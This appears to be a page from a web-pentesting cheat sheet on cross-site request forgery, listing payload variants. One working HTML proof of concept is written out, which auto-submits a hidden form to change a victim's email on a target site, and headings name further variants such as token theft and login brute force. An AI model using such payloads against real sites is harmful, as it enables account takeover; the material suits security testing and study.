CSRF

CSRF Checklist

Form GET request

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form method="GET" action="https://victim.net/email/change-email">
      <input type="hidden" name="email" value="some@email.com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Form POST request

Form POST request through iframe

Ajax POST request

multipart/form-data POST request

multipart/form-data POST request v2

Form POST request from within an iframe

Steal CSRF Token and send a POST request

Steal CSRF Token and send a Post request using an iframe, a form and Ajax

Steal CSRF Token and sen a POST request using an iframe and a form

Steal token and send it using 2 iframes

POSTSteal CSRF token with Ajax and send a post with a form

CSRF with Socket.IO

CSRF Login Brute Force

The code can be used to Brut Force a login form using a CSRF token (It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting):

PreviousInformation DisclosureNextCRLF Injection

Last updated